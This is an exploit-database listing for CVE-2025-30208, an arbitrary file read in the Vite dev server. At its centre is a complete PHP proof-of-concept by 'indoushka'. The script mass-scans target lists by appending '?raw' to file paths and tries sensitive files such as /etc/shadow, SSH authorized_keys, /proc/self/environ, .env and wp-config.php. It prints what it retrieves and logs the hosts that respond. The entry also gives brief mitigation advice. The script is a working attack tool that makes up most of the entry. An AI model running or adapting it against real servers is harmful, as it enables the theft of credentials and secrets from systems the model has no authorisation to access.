Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Vite 6.2.2 Arbitrary File Read

🗓️ 10 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 200 Views

Vite 6.2.2 arbitrary file read via crafted path ?raw; PHP PoC tests targets and retrieves local files.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-30208
26 Mar 202515:42
githubexploit
GithubExploit		Exploit for CVE-2025-30208
26 Mar 202519:06
githubexploit
GithubExploit		Exploit for CVE-2025-30208
26 Mar 202517:14
githubexploit
GithubExploit		Exploit for Improper Access Control in Vitejs Vite
4 Mar 202607:29
githubexploit
GithubExploit		Exploit for CVE-2025-30208
3 Apr 202511:46
githubexploit
GithubExploit		Exploit for CVE-2025-30208
27 Mar 202512:36
githubexploit
GithubExploit		Exploit for CVE-2025-30208
27 Mar 202512:55
githubexploit
GithubExploit		Exploit for CVE-2025-30208
24 Apr 202510:53
githubexploit
GithubExploit		Exploit for CVE-2025-30208
25 Jun 202519:04
githubexploit
GithubExploit		Exploit for CVE-2025-30208
31 Mar 202513:43
githubexploit
Rows per page
=============================================================================================================================================
    | # Title     : Vite 6.2.2 Arbitrary File Read – PHP Exploit                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://vite.dev/                                                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/190227/ & 	CVE-2025-30208
    
    [+] Summary 
    
    
    Vite contains an arbitrary file read vulnerability allowing an attacker to read arbitrary files on the server by requesting a crafted path suffixed with ?raw. This PoC demonstrates automated checks for a target or a list of targets and attempts to retrieve local files by appending ?raw.
    
    Technical Details:
    
    The PoC sends HTTP GET requests to TARGET + FILE_PATH + "?raw".
    
    When the response code is HTTP 200 and the response body is non-empty, the file is considered retrievable (vulnerable).
    
    The PoC uses cURL (in PHP) and allows toggles for verbose output, output file, and trying multiple payloads.
    
    A production-ready PHP script vite_afr_poc.php is provided (see above).
    
    [+] Usage examples:
    
    Single target: php poc.php http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt
    
    Multiple targets: poc.php --list=targets.txt --try-all --output=found.txt
    
    [+] Impact:
    
    Disclosure of sensitive files such as /etc/passwd, .env, config files, and other server-local secrets.
    
    [+] Mitigation:
    
    Upgrade Vite to the vendor-fixed version. Apply vendor patches.
    
    Harden server-side path handling and ensure raw file access isn't exposed via the webserver or dev server endpoints.
    
    In production, disable dev server features or restrict them to loopback interfaces only.
    
    [+] poc
    
    Run using: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]
    
    
    <?php
    /**
     * PoC: CVE-2025-30208 - Vite Arbitrary File Read 
     * Usage: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]
     * by indoushka
     */
    
    ini_set('display_errors', "0");
    date_default_timezone_set('UTC');
    
    $options = getopt("", ["list:", "file:", "verbose", "output:", "try-all", "help"]);
    $argv_copy = $argv;
    array_shift($argv_copy); // remove script name
    
    // Determine positional target if provided
    $target = null;
    foreach ($argv_copy as $arg) {
        if (substr($arg, 0, 2) === "--") continue;
        if ($arg === basename(__FILE__)) continue;
        // skip known flags (handled by getopt)
        if (strpos($arg, '=') !== false) continue;
        // take first non-flag as target
        if ($target === null) $target = $arg;
    }
    
    // Default file based on OS
    $osFamily = PHP_OS_FAMILY; // "Windows", "Linux", "Darwin", etc.
    $defaultFile = ($osFamily === "Windows") ? "C:\\Windows\\System32\\drivers\\etc\\hosts" : "/etc/passwd";
    
    $fileToRead = isset($options['file']) ? $options['file'] : $defaultFile;
    $domainListFile = isset($options['list']) ? $options['list'] : null;
    $verbose = isset($options['verbose']);
    $outputFile = isset($options['output']) ? $options['output'] : null;
    $tryAll = isset($options['try-all']);
    
    // Payloads (common sensitive paths) — used when --try-all provided
    $payloads = [
        // Unix/Linux
        "/etc/passwd",
        "/etc/hosts",
        "/proc/self/environ",
        "/etc/shadow",
        "/root/.ssh/authorized_keys",
        // Common web files
        "/.env",
        "/config.php",
        "/wp-config.php",
        // Windows
        "C:\\Windows\\System32\\drivers\\etc\\hosts",
        "C:\\Windows\\win.ini"
    ];
    
    function print_rtl($text) {
        // For CLI, we just output. The user requested RTL formatting in chat.
        echo $text . PHP_EOL;
    }
    
    function build_url($target, $path) {
        // Build URL carefully: if target ends with slash and path begins with slash, avoid double slash.
        $t = rtrim($target, "/");
        // If path is absolute file path (starts with / or letter:), we still append as in original PoC: target + path + ?raw
        // But for Windows paths, convert backslashes to forward slashes for URL usage.
        $p = $path;
        $p = str_replace("\\", "/", $p);
        // Ensure there's a slash between target and path if not present
        if (strpos($p, "/") !== 0) {
            $p = "/" . $p;
        }
        return $t . $p . "?raw";
    }
    
    function http_get($url, $timeout = 5) {
        // Use cURL
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        // Ignore SSL verification like original PoC
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        // Set a reasonable User-Agent
        curl_setopt($ch, CURLOPT_USERAGENT, "PoC-CVE-2025-30208-php/1.0");
        $body = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $err = null;
        if ($body === false) {
            $err = curl_error($ch);
        }
        curl_close($ch);
        return ['code' => $http_code, 'body' => $body, 'error' => $err];
    }
    
    function report_vuln($url, $outputFile = null) {
        $msg = "[+] Vulnerable : " . $url;
        echo $msg . PHP_EOL;
        if ($outputFile) {
            file_put_contents($outputFile, $url . PHP_EOL, FILE_APPEND | LOCK_EX);
        }
    }
    
    function check_vulnerability($target, $filePath, $verbose=false, $output=null) {
        $url = build_url($target, $filePath);
        echo "[*] Testing: {$url}" . PHP_EOL;
        $res = http_get($url, 5);
        if ($res['error']) {
            echo "[!] Error testing {$url}: " . $res['error'] . PHP_EOL;
            return;
        }
        if ($res['code'] === 200 && strlen((string)$res['body']) > 0) {
            report_vuln($url, $output);
            if ($verbose) {
                echo PHP_EOL . "--- File Content Start ---" . PHP_EOL;
                // Print first 500 chars safely
                $snippet = mb_substr((string)$res['body'], 0, 500);
                echo $snippet . PHP_EOL;
                echo "--- File Content End ---" . PHP_EOL . PHP_EOL;
            }
        } else {
            echo "[-] Not vulnerable or file does not exist: {$url} (HTTP {$res['code']})" . PHP_EOL;
        }
    }
    
    function check_multiple_domains($filePath, $domainListFile, $verbose=false, $output=null, $tryAll=false, $payloads=[]) {
        if (!file_exists($domainListFile)) {
            echo "[!] Error: The file '{$domainListFile}' does not exist." . PHP_EOL;
            return;
        }
        $lines = file($domainListFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        foreach ($lines as $domain) {
            $domain = trim($domain);
            if ($domain === "") continue;
            if ($tryAll && !empty($payloads)) {
                foreach ($payloads as $p) {
                    check_vulnerability($domain, $p, $verbose, $output);
                }
            } else {
                check_vulnerability($domain, $filePath, $verbose, $output);
            }
        }
    }
    
    // Main execution flow
    if (isset($options['help'])) {
        echo "Usage: php " . basename(__FILE__) . " [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]" . PHP_EOL;
        exit(0);
    }
    
    if ($domainListFile) {
        check_multiple_domains($fileToRead, $domainListFile, $verbose, $outputFile, $tryAll, $payloads);
    } elseif ($target) {
        if ($tryAll) {
            foreach ($payloads as $p) {
                check_vulnerability($target, $p, $verbose, $outputFile);
            }
        } else {
            check_vulnerability($target, $fileToRead, $verbose, $outputFile);
        }
    } else {
        echo "Please provide a target URL or a domain list file. Example:" . PHP_EOL;
        echo "php " . basename(__FILE__) . " http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt" . PHP_EOL;
        echo "php " . basename(__FILE__) . " --list=targets.txt --try-all --output=found.txt" . PHP_EOL;
        exit(1);
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2026 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.15.3 - 7.5
EPSS0.89847
SSVC
vite vulnerabilityarbitrary file readcrafted pathraw suffixtarget checks
200